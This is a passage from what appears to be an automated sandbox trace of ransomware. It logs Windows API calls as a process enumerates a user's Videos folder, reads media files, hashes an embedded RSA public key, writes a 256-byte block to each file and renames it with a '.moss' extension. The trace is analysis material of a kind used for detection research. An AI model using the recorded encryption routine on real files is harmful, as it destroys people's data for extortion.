lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.568] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\UYbsuYquLTF3oeW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\uybsuyqultf3oew.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\UYbsuYquLTF3oeW.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\uybsuyqultf3oew.flv.moss")) returned 1 [0172.569] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.570] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0172.570] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\") returned="O3UCSFjw\\" [0172.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\") returned="V4xTSO7L1q6Ip\\" [0172.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0172.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.574] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.574] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.575] PathFindFileNameW (pszPath="") returned="" [0172.575] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc182e060, ftCreationTime.dwHighDateTime=0x1d5e6d5, ftLastAccessTime.dwLowDateTime=0x52774c20, ftLastAccessTime.dwHighDateTime=0x1d5e34b, ftLastWriteTime.dwLowDateTime=0x52774c20, ftLastWriteTime.dwHighDateTime=0x1d5e34b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.575] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc182e060, ftCreationTime.dwHighDateTime=0x1d5e6d5, ftLastAccessTime.dwLowDateTime=0x52774c20, ftLastAccessTime.dwHighDateTime=0x1d5e34b, ftLastWriteTime.dwLowDateTime=0x52774c20, ftLastWriteTime.dwHighDateTime=0x1d5e34b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.575] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8280ab00, ftCreationTime.dwHighDateTime=0x1d5daf9, ftLastAccessTime.dwLowDateTime=0x882339e0, ftLastAccessTime.dwHighDateTime=0x1d5d89e, ftLastWriteTime.dwLowDateTime=0x882339e0, ftLastWriteTime.dwHighDateTime=0x1d5d89e, nFileSizeHigh=0x0, nFileSizeLow=0x4443, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2MYj1_f52PTn1yg8.mp4", cAlternateFileName="2MYJ1_~1.MP4")) returned 1 [0172.575] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\2MYj1_f52PTn1yg8.mp4") returned=".mp4" [0172.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\2MYj1_f52PTn1yg8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\2myj1_f52ptn1yg8.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.575] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=17475) returned 1 [0172.575] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.578] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x441d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.578] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.579] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x4443, lpOverlapped=0x0) returned 1 [0172.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.579] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.580] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.580] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.580] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.580] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.580] GetLastError () returned 0x0 [0172.580] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.580] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.581] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.581] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.581] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.581] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.581] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x4443, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.581] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.582] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\2MYj1_f52PTn1yg8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\2myj1_f52ptn1yg8.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\2MYj1_f52PTn1yg8.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\2myj1_f52ptn1yg8.mp4.moss")) returned 1 [0172.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.582] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.583] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4713fbe0, ftCreationTime.dwHighDateTime=0x1d5e47b, 